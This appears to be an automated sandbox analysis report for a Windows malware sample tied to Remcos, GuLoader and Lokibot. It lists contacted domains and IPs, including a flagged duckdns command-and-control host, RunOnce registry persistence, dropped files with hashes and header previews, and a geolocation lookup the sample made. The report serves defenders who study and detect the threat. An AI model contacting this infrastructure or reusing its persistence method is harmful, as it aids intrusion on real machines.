                                                                                        https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhv9ED5.tmp.6.drfalse
                                                                                          high
                                                                                          https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhv9ED5.tmp.6.drfalse
                                                                                            high
                                                                                            https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhv9ED5.tmp.6.drfalse
                                                                                              high
                                                                                              https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhv9ED5.tmp.6.drfalse
                                                                                                high
                                                                                                http://www.imvu.comz120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000003.2595387995.000000000056D000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000003.2595293786.000000000056D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://aefd.nelreports.net/api/report?cat=wsbbhv9ED5.tmp.6.drfalse
                                                                                                    high
                                                                                                    https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhv9ED5.tmp.6.drfalse
                                                                                                      high
                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorz120X20SO__UK__EKMELAMA.exe, Tabelopstninger.exe.4.drfalse
                                                                                                        high
                                                                                                        https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhv9ED5.tmp.6.drfalse
                                                                                                          high
                                                                                                          http://nsis.sf.net/NSIS_Errorz120X20SO__UK__EKMELAMA.exe, Tabelopstninger.exe.4.drfalse
                                                                                                            high
                                                                                                            https://aefd.nelreports.net/api/report?cat=bingaotbhv9ED5.tmp.6.drfalse
                                                                                                              high
                                                                                                              https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhv9ED5.tmp.6.drfalse
                                                                                                                high
                                                                                                                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhv9ED5.tmp.6.drfalse
                                                                                                                  high
                                                                                                                  https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhv9ED5.tmp.6.drfalse
                                                                                                                    high
                                                                                                                    https://aefd.nelreports.net/api/report?cat=bingrmsbhv9ED5.tmp.6.drfalse
                                                                                                                      high
                                                                                                                      https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhv9ED5.tmp.6.drfalse
                                                                                                                        high
                                                                                                                        https://www.google.com/accounts/serviceloginz120X20SO__UK__EKMELAMA.exefalse
                                                                                                                          high
                                                                                                                          https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhv9ED5.tmp.6.drfalse
                                                                                                                            high
                                                                                                                            https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhv9ED5.tmp.6.drfalse
                                                                                                                              high
                                                                                                                              https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhv9ED5.tmp.6.drfalse
                                                                                                                                high
                                                                                                                                http://geoplugin.net/son.gpTz120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2583060102.0000000005500000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2813652068.0000000005502000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2592319206.0000000005500000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://kinltd.top/az120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.0000000005498000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhv9ED5.tmp.6.drfalse
                                                                                                                                      high
                                                                                                                                      http://www.ebuddy.comz120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs
                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        104.21.24.17
                                                                                                                                        kinltd.topUnited States
                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                        172.111.244.132
                                                                                                                                        gerfourt99lahjou1.duckdns.orgUnited States
                                                                                                                                        9009M247GBtrue
                                                                                                                                        178.237.33.50
                                                                                                                                        geoplugin.netNetherlands
                                                                                                                                        8455ATOM86-ASATOM86NLfalse
                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                        Analysis ID:1549086
                                                                                                                                        Start date and time:2024-11-05 10:01:06 +01:00
                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 7m 31s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                        Number of analysed new started processes analysed:9
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Sample name:z120X20SO__UK__EKMELAMA.exe
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal100.phis.troj.spyw.evad.winEXE@9/20@3/3
                                                                                                                                        EGA Information:
                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 97%
                                                                                                                                        • Number of executed functions: 180
                                                                                                                                        • Number of non-executed functions: 322
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                        • VT rate limit hit for: z120X20SO__UK__EKMELAMA.exe
                                                                                                                                        TimeTypeDescription
                                                                                                                                        04:03:58API Interceptor6x Sleep call for process: z120X20SO__UK__EKMELAMA.exe modified
                                                                                                                                        09:03:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Alcohol C:\Users\user\AppData\Local\Temp\Melosa\Tabelopstninger.exe
                                                                                                                                        09:03:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Alcohol C:\Users\user\AppData\Local\Temp\Melosa\Tabelopstninger.exe
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        104.21.24.17bUXxykcTPKqVTCw.exeGet hashmaliciousLokibotBrowse
                                                                                                                                        • kinltd.top/evie1/five/fre.php
                                                                                                                                        178.237.33.501730761565ca8b10976d269a244a27517737ed7f4931b494c3a64f53d6fc99bd809a11aead352.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                        orders_PI 008-01.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                        segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                        4qmS30qgbA.exeGet hashmaliciousRemcos, AsyncRAT, PureLog StealerBrowse
                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                        New_Order_#070824_Order_November-2024-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                        1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                        z1ProductSampleRequirement.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                        17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                        5Tqze.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                        PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • geoplugin.net/json.gp
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        kinltd.topc76qotShuobGjnp.exeGet hashmaliciousLokibotBrowse
                                                                                                                                        • 172.67.216.75
                                                                                                                                        bUXxykcTPKqVTCw.exeGet hashmaliciousLokibotBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        geoplugin.net1730761565ca8b10976d269a244a27517737ed7f4931b494c3a64f53d6fc99bd809a11aead352.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        orders_PI 008-01.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        4qmS30qgbA.exeGet hashmaliciousRemcos, AsyncRAT, PureLog StealerBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        New_Order_#070824_Order_November-2024-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        z1ProductSampleRequirement.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        5Tqze.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        CLOUDFLARENETUSinvestment-fund.msiGet hashmaliciousUnknownBrowse
                                                                                                                                        • 162.159.140.238
                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                        • 104.21.5.155
                                                                                                                                        De_posit Confirmati0n_ Mitie.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                        • 104.16.119.9
                                                                                                                                        dAbl40hKOa.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                        • 172.67.133.135
                                                                                                                                        https://kbprinters.com/serviciodecorreo/loginGet hashmaliciousUnknownBrowse
                                                                                                                                        • 1.1.1.1
                                                                                                                                        https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&esrc=nNeW8FA0xys8Em2FL&source=&cd=tS6T8Tiw9XH&cad=XpPkDfJXVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am%70%2F%77%77%77%2E%64%65%72%79%61%6E%63%6F%6E%73%75%6C%74%69%6E%67%2E%63%6F%6D%2F%74%31%62%72%6F%77%6E%34%35%2F1112449584/aGVsZW5AY3VyZXBhcmtpbnNvbnMub3JnLnVrGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                        • 66.235.200.251
                                                                                                                                        https://astonishing-maize-sunstone.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                        • 188.114.96.3
                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                        • 172.67.133.135
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                        • 104.21.5.155
                                                                                                                                        RP3pRLkLSH.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                        • 104.21.5.155
                                                                                                                                        M247GBmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 213.182.204.57
                                                                                                                                        arm7-20241104-0018.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 213.182.204.57
                                                                                                                                        arm4-20241104-0018.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 213.182.204.57
                                                                                                                                        arm5-20241104-0018.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 213.182.204.57
                                                                                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 213.182.204.57
                                                                                                                                        harm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 213.182.204.57
                                                                                                                                        m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.86.28.72
                                                                                                                                        x86_32.elfGet hashmaliciousGafgytBrowse
                                                                                                                                        • 196.16.120.129
                                                                                                                                        ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                        • 91.202.233.141
                                                                                                                                        harm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 213.182.204.57
                                                                                                                                        ATOM86-ASATOM86NL1730761565ca8b10976d269a244a27517737ed7f4931b494c3a64f53d6fc99bd809a11aead352.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        orders_PI 008-01.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        4qmS30qgbA.exeGet hashmaliciousRemcos, AsyncRAT, PureLog StealerBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        New_Order_#070824_Order_November-2024-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        z1ProductSampleRequirement.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        5Tqze.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 178.237.33.50
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        37f463bf4616ecd445d4a1937da06e19Request for quotation for the pumps.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        PerceivedFurthermore.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        build.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        Dekont#400577_89008_96634.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        att1-241104022450_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        Solicita#U021bi comanda p78460.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        Aj#U00e1nlatk#U00e9r#U00e9s 11-04-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        Tariffizes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        SPP_14667098030794_8611971920#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        Pedido de Cota#U00e7#U00e3o-24110004.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • 104.21.24.17
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dllQuotation-GINC-19-00204.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          Produkttyper.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                            Impressionist.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                              PAGO.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                PAGO.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                  Obstetricated.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                    Orden de compra.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      Orden de compra.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                        Orden de compra.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                          Orden de compra.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):957
                                                                                                                                                            Entropy (8bit):5.007210272484937
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:qsdbauKyGX85jHf3SvXhNlT3/7YvfbYro:x00GX85mvhjTkvfEro
                                                                                                                                                            MD5:D31C4A4434AF997F4EA492A58E5B42A2
                                                                                                                                                            SHA1:4F02CADEF56323C2126F24D4290B341F0E8A7EDD
                                                                                                                                                            SHA-256:9078B89D542CF014E10FB801C387283933EF8DCA60FA20A43542820F471CE2EB
                                                                                                                                                            SHA-512:CF822F9BD3635B11DF05174A5800F1E0F3F153BB12D9B5D62F931E6F03FAD856EF3D5E5614865DAB7FCABD101BEF5034AB3344F5846CF22DF67D72AC8E87A31F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:{. "geoplugin_request":"173.254.250.76",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):840016
                                                                                                                                                            Entropy (8bit):7.953971896725772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:B0kvxRgbWjWwCpAx0CGznjfIpEj5pWly3X4UxZYQSxRR1k6tZcFjacQ34rmQ:hvxibaQS0dIpEj5YlXuZ4xT1/4IcL
                                                                                                                                                            MD5:CBA1A6515C0AC0889F04664FEDAEC3E3
                                                                                                                                                            SHA1:FF6672EC2A7960CFEE821ABEDF3F2CA71E396206
                                                                                                                                                            SHA-256:B39398684ECB03EB8EC7E1288B01CB1CD0D14B263CCB3579456592C1B234617B
                                                                                                                                                            SHA-512:7BF17B3B549503A1C5BB2ABFC7EA6C2FDE674282059C9C896532AD8721F1F2F0120420CB4BA44E5B4726B4454AAAE6572224454886B1233C44D160E79F640151
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@.................................R.....@.................................D........@...u..........p................................................................................................text...Wd.......f.................. ..`.rdata...............j..............@..@.data...8U...........~..............@....ndata...@...............................rsrc....u...@...v..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf2094dab, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20447232
                                                                                                                                                            Entropy (8bit):1.2847898169914282
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:5EsPOhijljKhBfvUDv22+555ckQB8WBbXnE:hii9JDZ+
                                                                                                                                                            MD5:269B122CE7D2ACFDAF7E4D027B5AD1F4
                                                                                                                                                            SHA1:9A7A92F33615317C35F793B1CB36403181F7B845
                                                                                                                                                            SHA-256:37B56BD7C3069CD9EE7F5825026C7502B7DA204C3666262F87387C57F0479818
                                                                                                                                                            SHA-512:738DA5FA7C78605058643D6FFB795AE27C9F25E47C5E011C14810A1853583AE7BBDF7C33B05F837B8E69D69DECA2BE61AE536189380EEDCB7E4CAFC654D8640D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:..M.... ........=......J}...0...{........................"..........{I......{1.h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;..................................o.......{1.........................{1..........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Qn:Qn
                                                                                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                            Preview:..
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):30
                                                                                                                                                            Entropy (8bit):4.256564762130954
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                                                                                                            MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                                                                                                            SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                                                                                                                            SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                                                                                                            SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview:user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11776
                                                                                                                                                            Entropy (8bit):5.854450882766351
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                                                                                                                            MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                                                                                                                            SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                                                                                                                            SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                                                                                                                            SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: Quotation-GINC-19-00204.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Produkttyper.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Impressionist.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: PAGO.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: PAGO.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Obstetricated.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Orden de compra.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Orden de compra.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Orden de compra.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: Orden de compra.exe, Detection: malicious, Browse
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):74
                                                                                                                                                            Entropy (8bit):3.9637832956585757
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                                                                                                            MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                                                                                                            SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                                                                                                            SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                                                                                                            SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
